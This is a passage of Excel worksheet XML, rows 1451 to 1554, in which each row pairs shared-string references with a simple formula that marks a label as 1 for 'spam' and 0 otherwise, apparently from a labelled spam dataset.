    <row r="1451" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1451" t="s">
        <v>6701</v>
      </c>
      <c r="B1451" t="s">
        <v>5294</v>
      </c>
      <c r="C1451" s="1">
        <f>IF(B1451="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1452" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1452" t="s">
        <v>6702</v>
      </c>
      <c r="B1452" t="s">
        <v>5294</v>
      </c>
      <c r="C1452" s="1">
        <f>IF(B1452="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1453" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1453" t="s">
        <v>6703</v>
      </c>
      <c r="B1453" t="s">
        <v>5294</v>
      </c>
      <c r="C1453" s="1">
        <f>IF(B1453="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1454" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1454" t="s">
        <v>6704</v>
      </c>
      <c r="B1454" t="s">
        <v>5294</v>
      </c>
      <c r="C1454" s="1">
        <f>IF(B1454="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1455" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1455" t="s">
        <v>6705</v>
      </c>
      <c r="B1455" t="s">
        <v>5294</v>
      </c>
      <c r="C1455" s="1">
        <f>IF(B1455="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1456" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1456" t="s">
        <v>6706</v>
      </c>
      <c r="B1456" t="s">
        <v>5294</v>
      </c>
      <c r="C1456" s="1">
        <f>IF(B1456="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1457" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1457" t="s">
        <v>6707</v>
      </c>
      <c r="B1457" t="s">
        <v>5297</v>
      </c>
      <c r="C1457" s="1">
        <f>IF(B1457="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1458" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1458" t="s">
        <v>6708</v>
      </c>
      <c r="B1458" t="s">
        <v>5294</v>
      </c>
      <c r="C1458" s="1">
        <f>IF(B1458="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1459" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1459" t="s">
        <v>6709</v>
      </c>
      <c r="B1459" t="s">
        <v>5297</v>
      </c>
      <c r="C1459" s="1">
        <f>IF(B1459="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1460" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1460" t="s">
        <v>5788</v>
      </c>
      <c r="B1460" t="s">
        <v>5294</v>
      </c>
      <c r="C1460" s="1">
        <f>IF(B1460="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1461" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1461" t="s">
        <v>6710</v>
      </c>
      <c r="B1461" t="s">
        <v>5297</v>
      </c>
      <c r="C1461" s="1">
        <f>IF(B1461="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1462" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1462" t="s">
        <v>6711</v>
      </c>
      <c r="B1462" t="s">
        <v>5294</v>
      </c>
      <c r="C1462" s="1">
        <f>IF(B1462="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1463" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1463" t="s">
        <v>6712</v>
      </c>
      <c r="B1463" t="s">
        <v>5294</v>
      </c>
      <c r="C1463" s="1">
        <f>IF(B1463="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1464" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1464" t="s">
        <v>6713</v>
      </c>
      <c r="B1464" t="s">
        <v>5297</v>
      </c>
      <c r="C1464" s="1">
        <f>IF(B1464="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1465" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1465" t="s">
        <v>6714</v>
      </c>
      <c r="B1465" t="s">
        <v>5294</v>
      </c>
      <c r="C1465" s="1">
        <f>IF(B1465="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1466" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1466" t="s">
        <v>6715</v>
      </c>
      <c r="B1466" t="s">
        <v>5294</v>
      </c>
      <c r="C1466" s="1">
        <f>IF(B1466="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1467" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1467" t="s">
        <v>6716</v>
      </c>
      <c r="B1467" t="s">
        <v>5297</v>
      </c>
      <c r="C1467" s="1">
        <f>IF(B1467="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1468" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1468" t="s">
        <v>5496</v>
      </c>
      <c r="B1468" t="s">
        <v>5294</v>
      </c>
      <c r="C1468" s="1">
        <f>IF(B1468="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1469" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1469" t="s">
        <v>6717</v>
      </c>
      <c r="B1469" t="s">
        <v>5294</v>
      </c>
      <c r="C1469" s="1">
        <f>IF(B1469="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1470" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1470" t="s">
        <v>6718</v>
      </c>
      <c r="B1470" t="s">
        <v>5297</v>
      </c>
      <c r="C1470" s="1">
        <f>IF(B1470="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1471" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1471" t="s">
        <v>6719</v>
      </c>
      <c r="B1471" t="s">
        <v>5294</v>
      </c>
      <c r="C1471" s="1">
        <f>IF(B1471="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1472" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1472" t="s">
        <v>6720</v>
      </c>
      <c r="B1472" t="s">
        <v>5294</v>
      </c>
      <c r="C1472" s="1">
        <f>IF(B1472="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1473" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1473" t="s">
        <v>6721</v>
      </c>
      <c r="B1473" t="s">
        <v>5294</v>
      </c>
      <c r="C1473" s="1">
        <f>IF(B1473="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1474" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1474" t="s">
        <v>6722</v>
      </c>
      <c r="B1474" t="s">
        <v>5294</v>
      </c>
      <c r="C1474" s="1">
        <f>IF(B1474="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1475" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1475" t="s">
        <v>6723</v>
      </c>
      <c r="B1475" t="s">
        <v>5294</v>
      </c>
      <c r="C1475" s="1">
        <f>IF(B1475="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1476" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1476" t="s">
        <v>6724</v>
      </c>
      <c r="B1476" t="s">
        <v>5294</v>
      </c>
      <c r="C1476" s="1">
        <f>IF(B1476="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1477" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1477" t="s">
        <v>6725</v>
      </c>
      <c r="B1477" t="s">
        <v>5294</v>
      </c>
      <c r="C1477" s="1">
        <f>IF(B1477="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1478" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1478" t="s">
        <v>6726</v>
      </c>
      <c r="B1478" t="s">
        <v>5294</v>
      </c>
      <c r="C1478" s="1">
        <f>IF(B1478="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1479" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1479" t="s">
        <v>6727</v>
      </c>
      <c r="B1479" t="s">
        <v>5294</v>
      </c>
      <c r="C1479" s="1">
        <f>IF(B1479="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1480" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1480" t="s">
        <v>6728</v>
      </c>
      <c r="B1480" t="s">
        <v>5294</v>
      </c>
      <c r="C1480" s="1">
        <f>IF(B1480="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1481" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1481" t="s">
        <v>6729</v>
      </c>
      <c r="B1481" t="s">
        <v>5294</v>
      </c>
      <c r="C1481" s="1">
        <f>IF(B1481="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1482" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1482" t="s">
        <v>6730</v>
      </c>
      <c r="B1482" t="s">
        <v>5294</v>
      </c>
      <c r="C1482" s="1">
        <f>IF(B1482="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1483" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1483" t="s">
        <v>6731</v>
      </c>
      <c r="B1483" t="s">
        <v>5294</v>
      </c>
      <c r="C1483" s="1">
        <f>IF(B1483="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1484" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1484" t="s">
        <v>6531</v>
      </c>
      <c r="B1484" t="s">
        <v>5294</v>
      </c>
      <c r="C1484" s="1">
        <f>IF(B1484="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1485" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1485" t="s">
        <v>6732</v>
      </c>
      <c r="B1485" t="s">
        <v>5294</v>
      </c>
      <c r="C1485" s="1">
        <f>IF(B1485="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1486" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1486" t="s">
        <v>5376</v>
      </c>
      <c r="B1486" t="s">
        <v>5294</v>
      </c>
      <c r="C1486" s="1">
        <f>IF(B1486="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1487" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1487" t="s">
        <v>6733</v>
      </c>
      <c r="B1487" t="s">
        <v>5294</v>
      </c>
      <c r="C1487" s="1">
        <f>IF(B1487="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1488" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1488" t="s">
        <v>6734</v>
      </c>
      <c r="B1488" t="s">
        <v>5294</v>
      </c>
      <c r="C1488" s="1">
        <f>IF(B1488="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1489" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1489" t="s">
        <v>6735</v>
      </c>
      <c r="B1489" t="s">
        <v>5294</v>
      </c>
      <c r="C1489" s="1">
        <f>IF(B1489="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1490" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1490" t="s">
        <v>6736</v>
      </c>
      <c r="B1490" t="s">
        <v>5294</v>
      </c>
      <c r="C1490" s="1">
        <f>IF(B1490="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1491" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1491" t="s">
        <v>6737</v>
      </c>
      <c r="B1491" t="s">
        <v>5294</v>
      </c>
      <c r="C1491" s="1">
        <f>IF(B1491="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1492" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1492" t="s">
        <v>6738</v>
      </c>
      <c r="B1492" t="s">
        <v>5294</v>
      </c>
      <c r="C1492" s="1">
        <f>IF(B1492="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1493" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1493" t="s">
        <v>6739</v>
      </c>
      <c r="B1493" t="s">
        <v>5297</v>
      </c>
      <c r="C1493" s="1">
        <f>IF(B1493="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1494" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1494" t="s">
        <v>6740</v>
      </c>
      <c r="B1494" t="s">
        <v>5294</v>
      </c>
      <c r="C1494" s="1">
        <f>IF(B1494="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1495" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1495" t="s">
        <v>6741</v>
      </c>
      <c r="B1495" t="s">
        <v>5294</v>
      </c>
      <c r="C1495" s="1">
        <f>IF(B1495="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1496" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1496" t="s">
        <v>6742</v>
      </c>
      <c r="B1496" t="s">
        <v>5294</v>
      </c>
      <c r="C1496" s="1">
        <f>IF(B1496="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1497" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1497" t="s">
        <v>6743</v>
      </c>
      <c r="B1497" t="s">
        <v>5294</v>
      </c>
      <c r="C1497" s="1">
        <f>IF(B1497="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1498" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1498" t="s">
        <v>6744</v>
      </c>
      <c r="B1498" t="s">
        <v>5294</v>
      </c>
      <c r="C1498" s="1">
        <f>IF(B1498="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1499" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1499" t="s">
        <v>6745</v>
      </c>
      <c r="B1499" t="s">
        <v>5294</v>
      </c>
      <c r="C1499" s="1">
        <f>IF(B1499="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1500" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1500" t="s">
        <v>6746</v>
      </c>
      <c r="B1500" t="s">
        <v>5294</v>
      </c>
      <c r="C1500" s="1">
        <f>IF(B1500="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1501" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1501" t="s">
        <v>6747</v>
      </c>
      <c r="B1501" t="s">
        <v>5297</v>
      </c>
      <c r="C1501" s="1">
        <f>IF(B1501="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1502" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1502" t="s">
        <v>6748</v>
      </c>
      <c r="B1502" t="s">
        <v>5294</v>
      </c>
      <c r="C1502" s="1">
        <f>IF(B1502="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1503" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1503" t="s">
        <v>6749</v>
      </c>
      <c r="B1503" t="s">
        <v>5297</v>
      </c>
      <c r="C1503" s="1">
        <f>IF(B1503="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1504" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1504" t="s">
        <v>6750</v>
      </c>
      <c r="B1504" t="s">
        <v>5294</v>
      </c>
      <c r="C1504" s="1">
        <f>IF(B1504="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1505" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1505" t="s">
        <v>6751</v>
      </c>
      <c r="B1505" t="s">
        <v>5294</v>
      </c>
      <c r="C1505" s="1">
        <f>IF(B1505="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1506" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1506" t="s">
        <v>6752</v>
      </c>
      <c r="B1506" t="s">
        <v>5294</v>
      </c>
      <c r="C1506" s="1">
        <f>IF(B1506="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1507" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1507" t="s">
        <v>6753</v>
      </c>
      <c r="B1507" t="s">
        <v>5294</v>
      </c>
      <c r="C1507" s="1">
        <f>IF(B1507="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1508" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1508" t="s">
        <v>6754</v>
      </c>
      <c r="B1508" t="s">
        <v>5297</v>
      </c>
      <c r="C1508" s="1">
        <f>IF(B1508="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1509" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1509" t="s">
        <v>5543</v>
      </c>
      <c r="B1509" t="s">
        <v>5294</v>
      </c>
      <c r="C1509" s="1">
        <f>IF(B1509="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1510" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1510" t="s">
        <v>6755</v>
      </c>
      <c r="B1510" t="s">
        <v>5294</v>
      </c>
      <c r="C1510" s="1">
        <f>IF(B1510="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1511" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1511" t="s">
        <v>6756</v>
      </c>
      <c r="B1511" t="s">
        <v>5294</v>
      </c>
      <c r="C1511" s="1">
        <f>IF(B1511="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1512" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1512" t="s">
        <v>6757</v>
      </c>
      <c r="B1512" t="s">
        <v>5294</v>
      </c>
      <c r="C1512" s="1">
        <f>IF(B1512="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1513" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1513" t="s">
        <v>6758</v>
      </c>
      <c r="B1513" t="s">
        <v>5294</v>
      </c>
      <c r="C1513" s="1">
        <f>IF(B1513="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1514" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1514" t="s">
        <v>6759</v>
      </c>
      <c r="B1514" t="s">
        <v>5294</v>
      </c>
      <c r="C1514" s="1">
        <f>IF(B1514="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1515" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1515" t="s">
        <v>6760</v>
      </c>
      <c r="B1515" t="s">
        <v>5294</v>
      </c>
      <c r="C1515" s="1">
        <f>IF(B1515="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1516" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1516" t="s">
        <v>6761</v>
      </c>
      <c r="B1516" t="s">
        <v>5294</v>
      </c>
      <c r="C1516" s="1">
        <f>IF(B1516="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1517" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1517" t="s">
        <v>6762</v>
      </c>
      <c r="B1517" t="s">
        <v>5294</v>
      </c>
      <c r="C1517" s="1">
        <f>IF(B1517="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1518" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1518" t="s">
        <v>6763</v>
      </c>
      <c r="B1518" t="s">
        <v>5294</v>
      </c>
      <c r="C1518" s="1">
        <f>IF(B1518="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1519" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1519" t="s">
        <v>6764</v>
      </c>
      <c r="B1519" t="s">
        <v>5297</v>
      </c>
      <c r="C1519" s="1">
        <f>IF(B1519="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1520" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1520" t="s">
        <v>6765</v>
      </c>
      <c r="B1520" t="s">
        <v>5294</v>
      </c>
      <c r="C1520" s="1">
        <f>IF(B1520="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1521" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1521" t="s">
        <v>6766</v>
      </c>
      <c r="B1521" t="s">
        <v>5294</v>
      </c>
      <c r="C1521" s="1">
        <f>IF(B1521="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1522" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1522" t="s">
        <v>6767</v>
      </c>
      <c r="B1522" t="s">
        <v>5297</v>
      </c>
      <c r="C1522" s="1">
        <f>IF(B1522="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1523" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1523" t="s">
        <v>6768</v>
      </c>
      <c r="B1523" t="s">
        <v>5294</v>
      </c>
      <c r="C1523" s="1">
        <f>IF(B1523="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1524" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1524" t="s">
        <v>6769</v>
      </c>
      <c r="B1524" t="s">
        <v>5294</v>
      </c>
      <c r="C1524" s="1">
        <f>IF(B1524="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1525" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1525" t="s">
        <v>6770</v>
      </c>
      <c r="B1525" t="s">
        <v>5294</v>
      </c>
      <c r="C1525" s="1">
        <f>IF(B1525="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1526" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1526" t="s">
        <v>6771</v>
      </c>
      <c r="B1526" t="s">
        <v>5294</v>
      </c>
      <c r="C1526" s="1">
        <f>IF(B1526="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1527" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1527" t="s">
        <v>6772</v>
      </c>
      <c r="B1527" t="s">
        <v>5294</v>
      </c>
      <c r="C1527" s="1">
        <f>IF(B1527="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1528" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1528" t="s">
        <v>6773</v>
      </c>
      <c r="B1528" t="s">
        <v>5294</v>
      </c>
      <c r="C1528" s="1">
        <f>IF(B1528="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1529" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1529" t="s">
        <v>6774</v>
      </c>
      <c r="B1529" t="s">
        <v>5294</v>
      </c>
      <c r="C1529" s="1">
        <f>IF(B1529="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1530" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1530" t="s">
        <v>6775</v>
      </c>
      <c r="B1530" t="s">
        <v>5294</v>
      </c>
      <c r="C1530" s="1">
        <f>IF(B1530="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1531" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1531" t="s">
        <v>6776</v>
      </c>
      <c r="B1531" t="s">
        <v>5294</v>
      </c>
      <c r="C1531" s="1">
        <f>IF(B1531="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1532" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1532" t="s">
        <v>6777</v>
      </c>
      <c r="B1532" t="s">
        <v>5294</v>
      </c>
      <c r="C1532" s="1">
        <f>IF(B1532="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1533" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1533" t="s">
        <v>6778</v>
      </c>
      <c r="B1533" t="s">
        <v>5294</v>
      </c>
      <c r="C1533" s="1">
        <f>IF(B1533="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1534" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1534" t="s">
        <v>6779</v>
      </c>
      <c r="B1534" t="s">
        <v>5294</v>
      </c>
      <c r="C1534" s="1">
        <f>IF(B1534="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1535" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1535" t="s">
        <v>6780</v>
      </c>
      <c r="B1535" t="s">
        <v>5294</v>
      </c>
      <c r="C1535" s="1">
        <f>IF(B1535="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1536" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1536" t="s">
        <v>6781</v>
      </c>
      <c r="B1536" t="s">
        <v>5294</v>
      </c>
      <c r="C1536" s="1">
        <f>IF(B1536="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1537" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1537" t="s">
        <v>6782</v>
      </c>
      <c r="B1537" t="s">
        <v>5297</v>
      </c>
      <c r="C1537" s="1">
        <f>IF(B1537="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1538" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1538" t="s">
        <v>6783</v>
      </c>
      <c r="B1538" t="s">
        <v>5294</v>
      </c>
      <c r="C1538" s="1">
        <f>IF(B1538="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1539" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1539" t="s">
        <v>6784</v>
      </c>
      <c r="B1539" t="s">
        <v>5294</v>
      </c>
      <c r="C1539" s="1">
        <f>IF(B1539="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1540" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1540" t="s">
        <v>6785</v>
      </c>
      <c r="B1540" t="s">
        <v>5294</v>
      </c>
      <c r="C1540" s="1">
        <f>IF(B1540="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1541" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1541" t="s">
        <v>6786</v>
      </c>
      <c r="B1541" t="s">
        <v>5294</v>
      </c>
      <c r="C1541" s="1">
        <f>IF(B1541="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1542" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1542" t="s">
        <v>6787</v>
      </c>
      <c r="B1542" t="s">
        <v>5294</v>
      </c>
      <c r="C1542" s="1">
        <f>IF(B1542="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1543" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1543" t="s">
        <v>6788</v>
      </c>
      <c r="B1543" t="s">
        <v>5294</v>
      </c>
      <c r="C1543" s="1">
        <f>IF(B1543="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1544" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1544" t="s">
        <v>6789</v>
      </c>
      <c r="B1544" t="s">
        <v>5294</v>
      </c>
      <c r="C1544" s="1">
        <f>IF(B1544="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1545" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1545" t="s">
        <v>6790</v>
      </c>
      <c r="B1545" t="s">
        <v>5297</v>
      </c>
      <c r="C1545" s="1">
        <f>IF(B1545="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1546" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1546" t="s">
        <v>6791</v>
      </c>
      <c r="B1546" t="s">
        <v>5294</v>
      </c>
      <c r="C1546" s="1">
        <f>IF(B1546="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1547" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1547" t="s">
        <v>6792</v>
      </c>
      <c r="B1547" t="s">
        <v>5294</v>
      </c>
      <c r="C1547" s="1">
        <f>IF(B1547="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1548" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1548" t="s">
        <v>6793</v>
      </c>
      <c r="B1548" t="s">
        <v>5294</v>
      </c>
      <c r="C1548" s="1">
        <f>IF(B1548="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1549" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1549" t="s">
        <v>6794</v>
      </c>
      <c r="B1549" t="s">
        <v>5294</v>
      </c>
      <c r="C1549" s="1">
        <f>IF(B1549="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1550" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1550" t="s">
        <v>6795</v>
      </c>
      <c r="B1550" t="s">
        <v>5294</v>
      </c>
      <c r="C1550" s="1">
        <f>IF(B1550="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1551" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1551" t="s">
        <v>6796</v>
      </c>
      <c r="B1551" t="s">
        <v>5294</v>
      </c>
      <c r="C1551" s="1">
        <f>IF(B1551="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1552" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1552" t="s">
        <v>6797</v>
      </c>
      <c r="B1552" t="s">
        <v>5294</v>
      </c>
      <c r="C1552" s="1">
        <f>IF(B1552="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1553" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1553" t="s">
        <v>6798</v>
      </c>
      <c r="B1553" t="s">
        <v>5294</v>
      </c>
      <c r="C1553" s="1">
        <f>IF(B1553="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1554" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1554" t="s">
        <v>6799</v>
      </c>
      <c r="B1554" t="s">
        <v>5294</v>
      </c>
      <c r="C1554" s="1">
        <f>IF(B1554="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
